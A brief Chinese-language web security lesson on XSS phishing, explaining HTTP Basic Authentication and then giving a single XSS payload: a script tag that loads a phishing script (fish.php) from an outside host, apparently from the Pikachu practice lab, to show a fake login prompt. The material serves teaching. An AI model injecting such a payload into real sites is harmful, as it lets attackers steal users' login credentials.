风炫安全WEB安全学习第二十四节课 利用XSS钓鱼攻击

2021-01-09  本文已影响0人  风炫安全

风炫安全WEB安全学习第二十四节课 利用XSS钓鱼攻击

XSS钓鱼攻击

HTTP Basic Authentication认证

大家在登录网站的时候,大部分时候是通过一个表单提交登录信息。

但是有时候浏览器会弹出一个登录验证的对话框,如下图,这就是使用HTTP基本认证。

在你访问一个需要HTTP Basic Authentication的URL的时候,如果你没有提供用户名和密码,服务器就会返回401,如果你直接在浏览器中打开,浏览器会提示你输入用户名和密码,也就是上面的图示。

要在发送请求的时候添加HTTP Basic Authentication认证信息到请求中,有两种方法:

一是在请求头中添加Authorization: Authorization: "Basic 用户名和密码的base64加密字符串" 。
二是在url中添加用户名和密码。

<script src="http://fx.com/pikachu/pkxss/xfish/fish.php"></script>

参考:http://blog.evalshell.com/2020/12/20/风炫安全web安全学习第二十四节课-利用xss钓鱼攻击/

上一篇下一篇

猜你喜欢

热点阅读